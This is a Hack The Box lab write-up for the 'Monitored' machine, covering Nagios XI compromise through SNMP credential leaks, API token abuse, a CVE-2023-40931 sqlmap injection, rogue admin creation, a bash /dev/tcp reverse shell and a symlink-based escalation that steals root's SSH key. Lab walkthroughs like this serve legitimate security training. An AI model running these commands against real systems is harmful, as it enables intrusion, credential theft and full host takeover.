MONITORED (HTB) - JA Smith

# Lessons Learned - **Symlink an inaccessible file (e.g., /root/.ssh/id_rsa`) or dir `(e.g., `c:\xampp\htdocs\` or `/var/www/html/`) to a writable one** - If we spot lots of directories from a `ffuf` directory fuzz, turn to `feroxbuster` to drill-down into the associated dirs - Review documentation for API endpoints and look to gather authentication tokens and API keys to further access/enum - There is a `seclists` wordlist for API objects: `/usr/share/secLists/Discovery/Web-Content/api/objects.txt` - Manipulate light `nmap` scan to provide a comma separated list ```bash cat nmap/light | grep -v "(" | grep / | cut -d'/' -f 1 | sed -z 's/\n/,/g; s/,$/\n/' ``` --- # After-Action Attack Sequence - We have access to a Nagios login portal - Default creds don't work; sqli doesn't work; we cannot enumerate version - Directory fuzzing reveals multiple dirs including Shell in a Box at `/terminal` - SNMP enum reveals creds for `svc` - These don't work for Nagios or Shell in a Box - Return to Nagios enum - Some Googling reveals that nagios has three API sections objects, system, and config nested under `domain.tld/nagiosxi/api/v1/` - A forum post notes hat we can grab an authentication token with the following command: `curl -XPOST -k -L '[https://nagios.monitored.htb/nagiosxi/api/v1/authenticate?pretty=1](https://nagios.monitored.htb/nagiosxi/api/v1/authenticate?pretty=1)' -d 'username=USERNAME&password=YOURPASS&valid_min=5'` - Insert the creds for `svc` above - Now, use the auth token with the ?token GET parameter directed to the root dir - This provides access to the Nagios dashboard - Nagios access as `svc` - From here we see Nagios XI version 5.11.0 - A Google search reveals that this version of Nagios has an sqli vuln that can be used to dump the `xi_users` table - After running an `sqlmap` command to dump `xi_users`, we have API keys and uncrackable password hashes for `Nagios Administrator` and `svc` - Using the admin's API key, we can create an admin level user `jacob` - Admin Nagios access as `jacob` - From here we can add a revshell to the `Commands` tab of the `Core Config Manager` and run using `Monitoring-Hosts` tab of the `Core Config Manager` - Revshell as `nagios` - After enumerating with `sudo -l`, this user can run many services and scripts as root - Review `getprofile.sh`: this script retrieves the last 1000 line of several logs from `/usr/local/nagiosxi/var/` and `/var/log`, archives them and dumps the ZIP in `/usr/local/nagiosxi/var/components/` - Of note, `/usr/local/nagiosxi/tmp/phpmailer.log` is writable by `nagios` - We can abuse this writable `phpmailer.log` file by creating a symlink to `/root/.ssh/id_rsa` - Run `getprofile.sh` after creating the above symlink - Unzip the file in `/usr/local/nagiosxi/var/components/` and grab `id_rsa` - SSH connect as `root` with `id_rsa` --- # Discover Ports & Services - `ping` test ![[images/Pasted image 20260330200654.png]] - `nmap` scan - light ![[images/Pasted image 20260330201312.png]] - `nmap` scan - detailed ![[images/Pasted image 20260330201708.png]] - Note: port 80 redirected to port 443 associated with `nagios.monitored.htb` - Note: odd to have LDAP open on a Linux host - Note: port 5667 is a curiosity - This is a Nagios specific port - No exploits for Apache 2.4.56 - `nmap` scan - UDP ![[images/Pasted image 20260330210403.png]] - Not surprising that SNMP is open for a network monitoring tool, but deserves further inspection --- # Service Enum ## Port 443 (https): Apache 2.4.56 - Visit page ![[images/Pasted image 20260330202315.png]] - Request:Response in burp ![[images/Pasted image 20260330202423.png]] - Try `robots.txt` and `sitemap,xml` > standard 404 - Try random page > standard 404 - Try `index.php` > returns above page - Click on `Access Nagios XI` to bring up ![[images/Pasted image 20260330202633.png]] - Request:Response in burp![[images/Pasted image 20260330202803.png]] - Try default creds `nagiosadmin:admin` > not working - Google how to enumerate `Nagios XI` version - Search for msf module ![[images/Pasted image 20260330203839.png]] - Set options ![[images/Pasted image 20260330204015.png]] - web fuzzing - directory: raft-large ![[images/Pasted image 20260330204932.png]] - vhost: subdomain-top1million-20000 ![[images/Pasted image 20260330205254.png]] - visit `nagios.montiored.htb/nagiosxi/terminal` > shell in a box? ![[images/Pasted image 20260330204757.png]] - run `whatweb` ![[images/Pasted image 20260330205437.png]] - test for sqli > first create `req.txt` with POST request ```bash sqlmap -r req.txt --batch sqlmap -r req.txt --batch --risk=3 --level=5 ``` ## Port 161 (snmp) - Port specific scan ![[images/Pasted image 20260330211059.png]]![[images/Pasted image 20260330211118.png]] - Further SNMP specific enum is required ```bash onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt 10.129.230.96 snmpwalk -v2c -c public 10.129.230.96 | grep -i string > snmpwalk.txt ``` ![[images/Pasted image 20260331193451.png]] ![[images/Pasted image 20260331195747.png]] - Above we see creds for `svc` to run `/opt/scripts/check_host.sh` - Unable to ssh or access shell in a box with these creds - Also cannot get into Nagios with these creds ![[images/Pasted image 20260331194244.png]] ## Port 443 (https): API enum - After doing some Googling, we see that there are three API sections: `objects`, `system`, and `config` - These are nested under `domain.tld/nagiosxi/api/v1/` or for our example `nagios.monitored.htb/nagiosxi/api/v1/` - We need to determine how to return an authentication token - This post [Help with insecure login / backend ticket authentication. - Nagios Support Forum](https://support.nagios.com/forum/viewtopic.php?p=310411#p310411) indicates that we execute a `curl` command as below to grab an authencitation token ```bash curl -XPOST -k -L 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate?pretty=1' -d 'username=svc&password=YOURPASS&valid_min=5' ``` ![[images/Pasted image 20260331203354.png]] --- # Foothold as `svc` ## Use Authentication Token to Access Nagios Dashboard as `svc` - We know from the above post that we use the auth token with this GET param: `?token=ac15e2370b4df7b74e7a3970e6c38512360293cc` > try to use on main login page![[images/Pasted image 20260331204121.png]] - That get's us into the dashboard as `svc` ![[images/Pasted image 20260331204144.png]] - We are on version 5.11.0 ## Grab API Key for `admin` - Enumerate vulns for this version - Nothing for this version in `searchsploit` ![[images/Pasted image 20260331204348.png]] - Check Google ![[images/Pasted image 20260331204534.png]] - SQLi and authenticated RCE - This [post](https://medium.com/@n1ghtcr4wl3r/nagios-xi-vulnerability-cve-2023-40931-sql-injection-in-banner-ace8258c5567) provides an `sqlmap` command using the cookie for an authenticated user ```bash sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php" --data="id=3&action=acknowledge_banner_message" -p id --cookie "nagiosxi=mvtt1u5d54171n7uupops4gorh" --batch --threads 10 -D nagiosxi -T xi_users --dump ``` - The `xi_users` table provides API keys and uncrackable passwords ![[images/Pasted image 20260331205457.png]] ## Create admin level user `jacob` with admin's API key - Create an admin level user with the API key for `[email protected]` ```bash curl -d "username=jacob&password=password123@&name=jacobo&[email protected]&auth_level=admin&force_pw_change=0" -k 'https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL' ``` ![[images/Pasted image 20260331205838.png]] ## Access Nagios Dashboard as admin-level user `jacob` - Now try to login with new user > we are in as an admin ![[images/Pasted image 20260331205938.png]] ## Add a revshell to `commands` tab and run with `hosts` - With admin access we have access to the `commands` tab of the `Core Config Manager` ![[images/Pasted image 20260331210049.png]] - let's add a simple revshell ![[images/Pasted image 20260331211157.png]] ```bash bash -c 'bash -i >& /dev/tcp/10.10.14.197/443 0>&1' ``` - Now go to `Hosts` under the `Montioring` tab and select `revshell`, then select `Run Check Command` ![[images/Pasted image 20260331211005.png]] --- # Shell as `nagios` - We have a shell as `nagios` ![[images/Pasted image 20260331211209.png]] - Upgrade shell ```bash script /dev/null -c bash ^z stty raw -echo; fg reset screen ``` ## Privesc - Based on above `sudo -l` output there is a lot we have access to > let's focus on scripts we can run with `sudo` - According to `getprofile.sh`, logs files from `/var/log` are dumped into `usr/local/nagiosxi/var/components` - Of note, `/usr/local/nagiosxi/tmp/phpmailer.log` is owned by `nagios` ![[images/Pasted image 20260331213346.png]] - let's overwrite with symlink to `/root/.ssh/id_rsa` and confirm ```bash ln -sf /root/.ssh/id_rsa /usr/local/nagiosxi/tmp/phpmailer.log ls -l /usr/local/nagiosxi/tmp/phpmailer.log ``` ![[images/Pasted image 20260331213452.png]] - Now let's run `getprofile.sh` with `sudo` ![[images/Pasted image 20260331212025.png]] - According to the script the `.zip` file is saved in `/usr/local/nagiosxi/var/components` ```bash unzip -l profile.zip ``` ![[images/Pasted image 20260331213732.png]] - Review `phpmailer.log` > reveals an ssh privkey ```bash unzip -p profile.zip profile-1775007338/phpmailer.log -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn NhAAAAAwEAAQAAAYEAnZYnlG22OdnxaaK98DJMc9isuSgg9wtjC0r1iTzlSRVhNALtSd2C FSINj1byqeOkrieC8Ftrte+9eTrvfk7Kpa8WH0S0LsotASTXjj4QCuOcmgq9Im5SDhVG7/ ...[snip]... CNvArnlhyB8ZevAAAADnJvb3RAbW9uaXRvcmVkAQIDBA== -----END OPENSSH PRIVATE KEY----- ``` --- # Shell as `root` - Connect via `ssh` with `id_rsa` for `[email protected]` ```bash sudo chmod 600 id_rsa sudo ssh -i id_rsa [email protected] ``` ![[images/Pasted image 20260331214049.png]]